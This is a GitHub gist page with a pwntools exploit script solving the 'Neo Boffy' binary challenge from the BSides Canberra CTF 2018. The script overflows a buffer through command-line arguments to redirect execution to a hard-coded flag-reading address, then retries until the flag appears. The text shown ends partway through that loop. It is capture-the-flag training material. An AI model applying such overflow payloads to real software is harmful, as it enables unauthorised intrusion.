Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Solution to Neo Boffy from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
read_flag_offset = 0x8d0
read_flag = 0x565ee000 + read_flag_offset # Hard code since there is no aslr leak
loop_cap = 0x78 # This is where the loop caps
payload = ""
payload += "\x00" * 3 # ensure we can keep looping
payload += p32(read_flag)
payload += chr(loop_cap - 1 - len(payload))
payload = payload.rjust(0x79, "A")
# Keep trying until we find it
while True:
p = process([bin_path] + cmdify(payload))
out = p.recvall()
if "CTF{" in out:
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment